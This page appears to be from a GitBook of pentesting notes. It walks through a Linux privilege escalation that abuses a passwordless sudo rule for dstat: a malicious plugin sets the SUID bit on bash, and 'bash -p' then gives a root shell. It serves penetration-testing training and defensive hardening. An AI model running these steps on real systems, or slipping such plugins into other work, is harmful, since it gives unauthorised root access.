Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation

Sudo Dstat Privilege Escalation

Sudo dstat command might be vulnerable to privilege escalation (PrivEsc).

dstat is a versatile tool for generating system resource statistics. It allows users to create a custom plugin and execute by adding option e.g. dstat --myplugin.

Investigation

sudo -l

(ALL) NOPASSWD: /usr/bin/dstat
Copied!

If we can execute "dstat" command as root, we can gain access to privileges by using our malicious plugin.

Exploitation

1. Create a New Dstat Plugin

First off, find locate the "dstat" directory.

find / -type d -name dstat 2>/dev/null
Copied!

Assume the location of dstat is “/usr/local/share/dstat”. Create a plugin called "dstat_exploit.py" under "/usr/local/share/dstat/".

import os

os.system('chmod +s /usr/bin/bash')
Copied!

dstat recognizes plugins under "/usr/local/share/dstat/". Check if the above exploit plugin has been added by executing the following command.

dstat --list | grep exploit
Copied!

2. Execute Dstat with the Malicious Plugin

Now execute "dstat" with “—exploit” flag (the flag name is determined by the suffix of the file name e.g. "dstat_<plugin-name>.py").

sudo /usr/bin/dstat --exploit
Copied!

The exploit plugin executed so we enter bash as root.

bash -p
PreviousSudo ClamAV Privilege EscalationNextSudo Exiftool Privilege Escalation

Last updated 1 year ago

Page cover image